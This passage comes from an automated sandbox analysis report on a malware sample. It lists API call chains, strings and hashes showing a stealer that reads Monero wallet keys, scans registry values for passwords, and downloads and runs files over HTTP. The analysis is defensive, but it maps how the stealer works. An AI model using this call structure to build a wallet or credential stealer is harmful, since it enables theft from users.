                                                              • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                            • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                                            • memset.MSVCRT ref: 00401516
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                            • API String ID: 1930502592-218353709
                                                            • Opcode ID: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                                                            • Instruction ID: 674d48b949cffd92695f0a4f51b6d393b2dd06dcaa63b8f6d50fb5eb71b8da29
                                                            • Opcode Fuzzy Hash: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                                                            • Instruction Fuzzy Hash: AA5164B195011897CB15FB61DD91BED733CAF54304F4041ADB60A62091EE385BDACBAA
                                                            APIs
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                              • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,0087AEB0), ref: 00406303
                                                              • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                              • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0087A830,00000000,00000000,00400100,00000000), ref: 00406385
                                                              • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                              • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                            • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                              • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                            • lstrlenA.KERNEL32(00000000), ref: 00415383
                                                            • strtok.MSVCRT(00000000,?), ref: 0041539E
                                                            • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                            • API String ID: 3532888709-1526165396
                                                            • Opcode ID: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                            • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                                            • Opcode Fuzzy Hash: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                            • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                                            APIs
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                              • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                              • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                            • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                                            • StrCmpCA.SHLWAPI(?,0087AEB0), ref: 00406147
                                                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                                            • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                                            • InternetCloseHandle.WININET(a+A), ref: 00406253
                                                            • InternetCloseHandle.WININET(00000000), ref: 00406260
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                            • String ID: a+A$a+A
                                                            • API String ID: 4287319946-2847607090
                                                            • Opcode ID: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                            • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                                            • Opcode Fuzzy Hash: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                            • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                            • memset.MSVCRT ref: 022E0E83
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E0E9C
                                                            • lstrcat.KERNEL32(?,00420D7C), ref: 022E0EAE
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E0EC4
                                                            • lstrcat.KERNEL32(?,00420D80), ref: 022E0ED6
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E0EEF
                                                            • lstrcat.KERNEL32(?,00420D84), ref: 022E0F01
                                                            • lstrlen.KERNEL32(?), ref: 022E0F0E
                                                            • memset.MSVCRT ref: 022E0F34
                                                            • memset.MSVCRT ref: 022E0F48
                                                              • Part of subcall function 022EAA87: lstrlen.KERNEL32(022D516C,?,?,022D516C,00420DDE), ref: 022EAA92
                                                              • Part of subcall function 022EAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022EAAEC
                                                              • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                              • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                                              • Part of subcall function 022E9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,022E0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 022E9948
                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 022E0FC1
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 022E0FCD
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                            • String ID:
                                                            • API String ID: 1395395982-0
                                                            • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                            • Instruction ID: bb69edd30aa5c02f11f638149630c00747a39274ea46de07c3087315323c12c5
                                                            • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                            • Instruction Fuzzy Hash: 738180B5920318ABCF14EBE0DD91FED733AAF54304F804199A30B66185EE746B88DF59
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                            • memset.MSVCRT ref: 022E0E83
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E0E9C
                                                            • lstrcat.KERNEL32(?,00420D7C), ref: 022E0EAE
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E0EC4
                                                            • lstrcat.KERNEL32(?,00420D80), ref: 022E0ED6
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E0EEF
                                                            • lstrcat.KERNEL32(?,00420D84), ref: 022E0F01
                                                            • lstrlen.KERNEL32(?), ref: 022E0F0E
                                                            • memset.MSVCRT ref: 022E0F34
                                                            • memset.MSVCRT ref: 022E0F48
                                                              • Part of subcall function 022EAA87: lstrlen.KERNEL32(022D516C,?,?,022D516C,00420DDE), ref: 022EAA92
                                                              • Part of subcall function 022EAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022EAAEC
                                                              • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                              • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                                              • Part of subcall function 022E9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,022E0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 022E9948
                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 022E0FC1
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 022E0FCD
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                            • String ID:
                                                            • API String ID: 1395395982-0
                                                            • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                            • Instruction ID: 0f719fcb54180e06364c7099f59309dc57ef029f76345db033b3b98ece3461f4
                                                            • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                            • Instruction Fuzzy Hash: B561AEB5520318ABCF14EBE0DD85FED733AAF54304F804199A70B66185EE742B88CF59
                                                            APIs
                                                              • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                                              • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A51
                                                              • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A68
                                                              • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A7F
                                                              • Part of subcall function 022D4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022D4AA0
                                                              • Part of subcall function 022D4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022D4AB0
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 022D4B7C
                                                            • StrCmpCA.SHLWAPI(?,0064A480), ref: 022D4BA1
                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022D4D21
                                                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 022D504F
                                                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 022D506B
                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 022D507F
                                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 022D50B0
                                                            • InternetCloseHandle.WININET(00000000), ref: 022D5114
                                                            • InternetCloseHandle.WININET(00000000), ref: 022D512C
                                                            • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022D4D7C
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                            • InternetCloseHandle.WININET(00000000), ref: 022D5136
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                            • String ID:
                                                            • API String ID: 2402878923-0
                                                            • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                            • Instruction ID: 21a76691624c61f5b7b1424e415f815fb5e120f1ce242c80f8999c252b95355d
                                                            • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                            • Instruction Fuzzy Hash: 7B12A972920318AACF15EBD4DD91EEEB37ABF65300F904199A10762194EF742F88DF61
                                                            APIs
                                                              • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                                              • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A51
                                                              • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A68
                                                              • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A7F
                                                              • Part of subcall function 022D4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022D4AA0
                                                              • Part of subcall function 022D4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022D4AB0
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                            • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 022D6548
                                                            • StrCmpCA.SHLWAPI(?,0064A480), ref: 022D656A
                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022D659C
                                                            • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022D65EC
                                                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 022D6626
                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 022D6638
                                                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 022D6664
                                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 022D66D4
                                                            • InternetCloseHandle.WININET(00000000), ref: 022D6756
                                                            • InternetCloseHandle.WININET(00000000), ref: 022D6760
                                                            • InternetCloseHandle.WININET(00000000), ref: 022D676A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                            • String ID:
                                                            • API String ID: 3074848878-0
                                                            • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                            • Instruction ID: 010a79656eda3fd90a2a50c07f3ab8d02aca67028114a3aad40fe2fd1ca24a78
                                                            • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                            • Instruction Fuzzy Hash: 2A717E75A60318ABEF24DFE4DC48BEE7779FB44700F508199E10A6B294DBB46A84CF41
                                                            APIs
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 022E92D3
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateGlobalStream
                                                            • String ID:
                                                            • API String ID: 2244384528-0
                                                            • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                            • Instruction ID: 67a4045ee0eb0c53bb6f177a654d3697e84ca9963e2100c7ff82298365760a06
                                                            • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                            • Instruction Fuzzy Hash: 6B71FAB9A50208ABDB14DFE4DD84FEEB7BAFF49300F508108F506A7294DB74A944CB61
                                                            APIs
                                                            • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                                            • memset.MSVCRT ref: 0041716A
                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                                            Strings
                                                            • sA, xrefs: 004172AE, 00417179, 0041717C
                                                            • sA, xrefs: 00417111
                                                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: OpenProcesslstrcpymemset
                                                            • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                            • API String ID: 224852652-2614523144
                                                            • Opcode ID: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                            • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                                            • Opcode Fuzzy Hash: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                            • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                                            APIs
                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 022E77A9
                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 022E77E6
                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E786A
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022E7871
                                                            • wsprintfA.USER32 ref: 022E78A7
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                            • String ID: :$C$\$B
                                                            • API String ID: 1544550907-183544611
                                                            • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                            • Instruction ID: b090b413dba251d6d830d90180377f1f9ec6c1da5914251afc695a9631a2d21e
                                                            • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                            • Instruction Fuzzy Hash: 6A418EB1D10258ABDF10DFD4CC45BEEBBB9EF58700F400199E506A7280D7756A84DBA6
                                                            APIs
                                                              • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                                              • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                              • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                              • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                              • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                              • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                            • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                                            • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                                            • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                                            • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                                            • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                                            • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                                            • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                                            • task.LIBCPMTD ref: 004076FB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                            • String ID: :
                                                            • API String ID: 3191641157-3653984579
                                                            • Opcode ID: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                            • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                                            • Opcode Fuzzy Hash: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                            • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                                            APIs
                                                            • lstrcpy.KERNEL32(?,?), ref: 022E1642
                                                              • Part of subcall function 022E9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022E9072
                                                              • Part of subcall function 022E94C7: StrStrA.SHLWAPI(?,?), ref: 022E94D3
                                                            • lstrcpy.KERNEL32(?,00000000), ref: 022E167E
                                                              • Part of subcall function 022E94C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 022E94F7
                                                              • Part of subcall function 022E94C7: lstrlen.KERNEL32(?), ref: 022E950E
                                                              • Part of subcall function 022E94C7: wsprintfA.USER32 ref: 022E952E
                                                            • lstrcpy.KERNEL32(?,00000000), ref: 022E16C6
                                                            • lstrcpy.KERNEL32(?,00000000), ref: 022E170E
                                                            • lstrcpy.KERNEL32(?,00000000), ref: 022E1755
                                                            • lstrcpy.KERNEL32(?,00000000), ref: 022E179D
                                                            • lstrcpy.KERNEL32(?,00000000), ref: 022E17E5
                                                            • lstrcpy.KERNEL32(?,00000000), ref: 022E182C
                                                            • lstrcpy.KERNEL32(?,00000000), ref: 022E1874
                                                              • Part of subcall function 022EAA87: lstrlen.KERNEL32(022D516C,?,?,022D516C,00420DDE), ref: 022EAA92
                                                              • Part of subcall function 022EAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022EAAEC
                                                            • strtok_s.MSVCRT ref: 022E19B7
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
